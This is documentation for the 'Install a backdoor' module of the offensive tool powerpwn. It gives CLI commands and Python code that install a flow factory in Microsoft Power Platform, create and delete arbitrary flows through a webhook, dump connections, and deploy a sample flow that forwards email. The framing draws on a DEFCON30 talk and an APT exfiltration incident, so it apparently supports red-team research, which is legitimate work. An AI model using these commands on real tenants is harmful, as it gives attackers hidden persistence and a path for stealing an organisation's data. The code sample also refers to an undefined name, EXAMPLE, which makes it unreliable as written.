Modules: Install a backdoor
Maintain persistency on Power Platform by installing an automation factory that creates, executes and deletes arbitrary commands.
This capability was first presented at a DEFCON30 talk titled Low Code High Risk - Enterprise Domination via Low Code Abuse:
Inspired by a 2020 APT-related incident reported by Microsoft DART:
Threat actors create rules in the company's IT environment to automate data exfiltration to a third-party cloud storage solution.
For more info about the incident:
-
Install the backdoor flow factory by running:
powerpwn backdoor -e {environment-id} install-factory -c {flow management connector connection id} -t {tenant} -
Run
powerpwn --helpto get all available commands. -
To create flow run
powerpwn backdoor -e {environment-id} create-flow -webhook-url {url to installed factory} -i {full path to input}- You can find an example to input file in samples/sample_backdoor_flow_cli_input.json
-
To delete flow run
powerpwn -e {environment-id} backdoor delete-flow -webhook-url {url to installed factory} -f {flow-id} -
To get all connections run
powerpwn backdoor -e {environment-id} get-connections -webhook-url {url to installed factory} -o {output file}
from powerpwn.powerdoor.backdoor_flow import BackdoorFlow
from powerpwn.powerdoor.samples.forward_email_backdoor_flow import SAMPLE_FLOW
POST_URL = ""
factory = BackdoorFlow(post_url=POST_URL)
flow = factory.create_flow(
environment_id=SAMPLE_FLOW["environment"],
flow_display_name=SAMPLE_FLOW["flowDisplayName"],
flow_definition=SAMPLE_FLOW["flowDefinition"],
flow_state=SAMPLE_FLOW["flowState"],
connection_references=EXAMPLE["connectionReferences"]
)
factory.delete_flow(environment_id=SAMPLE_FLOW["environment"], flow_id=flow["name"])